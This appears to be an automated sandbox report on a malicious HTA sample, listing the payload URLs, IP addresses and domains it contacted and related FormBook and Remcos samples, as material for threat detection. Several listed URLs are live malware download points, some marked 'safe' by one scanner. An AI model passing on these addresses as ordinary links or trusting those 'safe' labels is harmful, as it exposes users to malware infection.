signatures26

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta21%ReversingLabsScript-WScript.Trojan.Asthma
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://146.70.155.254/1150/creat0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFo0%Avira URL Cloudsafe
                    http://crl.microsoftq0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFn0%Avira URL Cloudsafe
                    http://www.sportvas.online/omdp/0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/CRMMA.txt0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?filek0%Avira URL Cloudsafe
                    http://www.pegji.online0%Avira URL Cloudsafe
                    http://www.artherapy.online/1vmx/100%Avira URL Cloudmalware
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFLMEM0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?fileLR0%Avira URL Cloudsafe
                    http://www.pegji.online/8c06/0%Avira URL Cloudsafe
                    http://crl.microsoftj0%Avira URL Cloudsafe
                    http://146.70.155.254/0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFV0%Avira URL Cloudsafe
                    http://crl.microS0%Avira URL Cloudsafe
                    http://crl.mw0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF60%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFC:0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c0%Avira URL Cloudsafe
                    https://www.pegji.online/8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OX0%Avira URL Cloudsafe
                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF100%Avira URL Cloudmalware
                    https://3105.filemail.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    artherapy.online
                    3.33.130.190
                    truetrue
                      unknown
                      s-part-0035.t-0009.t-msedge.net
                      13.107.246.63
                      truefalse
                        high
                        ip.3105.filemail.com
                        193.30.119.205
                        truetrue
                          unknown
                          www.sportvas.online
                          184.94.215.26
                          truetrue
                            unknown
                            www.fzaqzjja.shop
                            172.67.163.245
                            truetrue
                              unknown
                              www.pegji.online
                              185.151.30.221
                              truetrue
                                unknown
                                www.artherapy.online
                                unknown
                                unknowntrue
                                  unknown
                                  3105.filemail.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    http://146.70.155.254/1150/CRMMA.txttrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sportvas.online/omdp/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.artherapy.online/1vmx/true
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.pegji.online/8c06/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ctrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFtrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://3105.filemail.com/api/file/get?filekpowershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pegji.onlineTjxlUxenxgDChq.exe, 00000012.00000002.2573432013.0000000000E7C000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/chrome_newtabcleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://146.70.155.254/1150/creatpowershell.exe, 00000001.00000002.1466721064.0000000005437000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://go.microspowershell.exe, 00000003.00000002.1357523946.0000000005070000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microsoftqpowershell.exe, 0000000A.00000002.1791419832.000000000758D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFopowershell.exe, 00000001.00000002.1465577748.00000000035D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFnpowershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1466721064.0000000005081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1357523946.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1473011068.00000000060EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1359205631.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1466721064.0000000005081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1357523946.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFLMEMpowershell.exe, 00000001.00000002.1474974184.0000000007C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://3105.filemail.com/api/file/get?fileLRpowershell.exe, 00000008.00000002.2519242280.0000000004C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1473011068.00000000060EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1359205631.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://146.70.155.254/powershell.exe, 00000001.00000002.1474974184.0000000007B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://go.micropowershell.exe, 00000001.00000002.1466721064.0000000005899000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFVpowershell.exe, 00000001.00000002.1465577748.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFC:powershell.exe, 00000001.00000002.1474974184.0000000007B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ecosia.org/newtab/cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.microSpowershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://ac.ecosia.org/autocomplete?q=cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.micropowershell.exe, 00000003.00000002.1360997024.000000000710E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crl.microsoftjpowershell.exe, 0000000A.00000002.1791419832.000000000758D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://crl.mwpowershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF6powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.pegji.online/8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OXcleanmgr.exe, 0000000F.00000002.2579593004.0000000005DFA000.00000004.10000000.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2579590373.00000000035AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://3105.filemail.compowershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      184.94.215.26
                                                                                      www.sportvas.onlineUnited States
                                                                                      394896VXCHNGE-NC01UStrue
                                                                                      193.30.119.205
                                                                                      ip.3105.filemail.comunknown
                                                                                      680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                                                                      146.70.155.254
                                                                                      unknownUnited Kingdom
                                                                                      2018TENET-1ZAtrue
                                                                                      3.33.130.190
                                                                                      artherapy.onlineUnited States
                                                                                      8987AMAZONEXPANSIONGBtrue
                                                                                      185.151.30.221
                                                                                      www.pegji.onlineUnited Kingdom
                                                                                      48254TWENTYIGBtrue
                                                                                      172.67.163.245
                                                                                      www.fzaqzjja.shopUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1562942
                                                                                      Start date and time:2024-11-26 09:48:18 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 8s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:20
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta
                                                                                      Detection:MAL
                                                                                      Classification:mal100.phis.troj.spyw.expl.evad.winHTA@26/21@6/6
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 37.5%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 94%
                                                                                      • Number of executed functions: 118
                                                                                      • Number of non-executed functions: 257
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .hta
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target TjxlUxenxgDChq.exe, PID 4572 because it is empty
                                                                                      • Execution Graph export aborted for target mshta.exe, PID 7544 because there are no executed function
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta
                                                                                      TimeTypeDescription
                                                                                      03:49:08API Interceptor125x Sleep call for process: powershell.exe modified
                                                                                      03:50:34API Interceptor317654x Sleep call for process: cleanmgr.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      184.94.215.26H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.sortcy.top/sm4f/
                                                                                      rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.namcist.xyz/h6bx/
                                                                                      Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.hellosmall.info/skre/
                                                                                      Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.guplace.xyz/s0g5/
                                                                                      SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tribevas.online/io0i/
                                                                                      193.30.119.205sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                          Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                              Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                  OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    146.70.155.254New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 146.70.155.254/1150/CRMMA.txt
                                                                                                    QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 146.70.155.254/1123/zw/bestthignswithbestwordsaregreatforeveryonetogetmebestchoosebestthignsgreat.hta
                                                                                                    3.33.130.190FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.funddata-x.net/ktuy/
                                                                                                    ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mcfunding.org/0598/
                                                                                                    santi.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.espiritismo.info/4knb/
                                                                                                    TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.platinumkitchens.info/x3qa/
                                                                                                    Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.goldstarfootwear.shop/8m07/
                                                                                                    Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mcfunding.org/0598/
                                                                                                    NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                    • www.qwibie.net/83g2/
                                                                                                    HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.micrhyms.info/y7on/
                                                                                                    MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ
                                                                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.marketprediction.app/ucmb/
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.sportvas.onlineKSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 184.94.215.26
                                                                                                    ip.3105.filemail.comsweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    www.fzaqzjja.shopKSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 104.21.15.203
                                                                                                    mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 104.21.15.203
                                                                                                    s-part-0035.t-0009.t-msedge.netDOC_111010118154524.vbeGet hashmaliciousFormBookBrowse
                                                                                                    • 13.107.246.63
                                                                                                    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                    • 13.107.246.63
                                                                                                    file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 13.107.246.63
                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 13.107.246.63
                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                    • 13.107.246.63
                                                                                                    https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                    • 13.107.246.63
                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                    • 13.107.246.63
                                                                                                    https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 13.107.246.63
                                                                                                    https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    DFNVereinzurFoerderungeinesDeutschenForschungsnetzesesweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 141.14.194.207
                                                                                                    fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 132.252.36.195
                                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 129.217.110.41
                                                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 141.33.15.156
                                                                                                    VXCHNGE-NC01USH1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.215.26
                                                                                                    rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.215.26
                                                                                                    Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.215.26
                                                                                                    Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.215.26
                                                                                                    SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.215.26
                                                                                                    https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDs09VcyycT&sa=t&esrc=s09VcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJC1GniFlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F4905038053/#bGVvbi5sYXZpbkB5b2RlbC5jby51aw===$%E3%80%82Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                    • 184.94.212.131
                                                                                                    FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.212.115
                                                                                                    FirstfedwebInv27-1486.htmlGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                    • 130.250.191.5
                                                                                                    https://lookerstudio.google.com/s/mPdl62g0mi8Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                    • 184.94.212.131
                                                                                                    DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 184.94.212.115
                                                                                                    AMAZONEXPANSIONGBINVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 3.33.130.190
                                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 3.50.113.19
                                                                                                    la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 3.51.106.140
                                                                                                    FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 3.33.130.190
                                                                                                    ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 3.33.130.190
                                                                                                    packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 3.33.130.190
                                                                                                    http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                                    • 3.33.220.150
                                                                                                    https://clever-photos-686127.framer.app/Get hashmaliciousUnknownBrowse
                                                                                                    • 52.223.52.2
                                                                                                    santi.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 3.33.130.190
                                                                                                    TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 3.33.130.190
                                                                                                    TENET-1ZANew RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 146.70.155.254
                                                                                                    QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 146.70.155.254
                                                                                                    comprobante.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 146.70.95.248
                                                                                                    fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 146.70.120.252
                                                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 146.65.185.223
                                                                                                    botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 146.232.38.35
                                                                                                    xd.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 155.232.197.119
                                                                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 146.68.147.161
                                                                                                    zgp.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 143.128.55.67
                                                                                                    amen.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 146.238.66.244
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
